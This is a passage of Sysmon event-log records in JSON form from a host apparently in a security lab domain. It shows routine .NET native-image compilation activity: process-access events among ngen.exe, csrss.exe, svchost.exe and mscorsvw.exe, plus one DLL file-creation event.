C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:04.200","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0520-5F25-0000-00104D861300}","TargetProcessId":"2840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8275,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:04.200\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0520-5F25-0000-00104D861300}\r\nTargetProcessId: 2840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:04.200","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0520-5F25-0000-00104D861300}","TargetProcessId":"2840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8276,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:04.200\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0520-5F25-0000-00104D861300}\r\nTargetProcessId: 2840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:04.200","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0520-5F25-0000-00104D861300}","TargetProcessId":"2840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8277,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:04.356\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-001039D41100}\r\nTargetProcessId: 644\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:04.356","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-001039D41100}","TargetProcessId":"644","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8278,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:04.356\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-001039D41100}\r\nTargetProcessId: 644\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:04.356","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-001039D41100}","TargetProcessId":"644","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8279,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:04.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0520-5F25-0000-0010218A1300}\r\nTargetProcessId: 644\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:04.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0520-5F25-0000-0010218A1300}","TargetProcessId":"644","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8280,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:01:06.309\r\nProcessGuid: {A837DB8D-0520-5F25-0000-0010218A1300}\r\nProcessId: 644\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\284-0\\WindowsBase.dll\r\nCreationUtcTime: 2020-08-01 06:01:06.309","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:01:06.309","ProcessGuid":"{A837DB8D-0520-5F25-0000-0010218A1300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\284-0\\WindowsBase.dll","CreationUtcTime":"2020-08-01 06:01:06.309","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8281,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:06.403\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0522-5F25-0000-00103C8F1300}\r\nTargetProcessId: 4044\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:06.403","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0522-5F25-0000-00103C8F1300}","TargetProcessId":"4044","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8282,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:06.403\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0522-5F25-0000-00103C8F1300}\r\nTargetProcessId: 4044\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 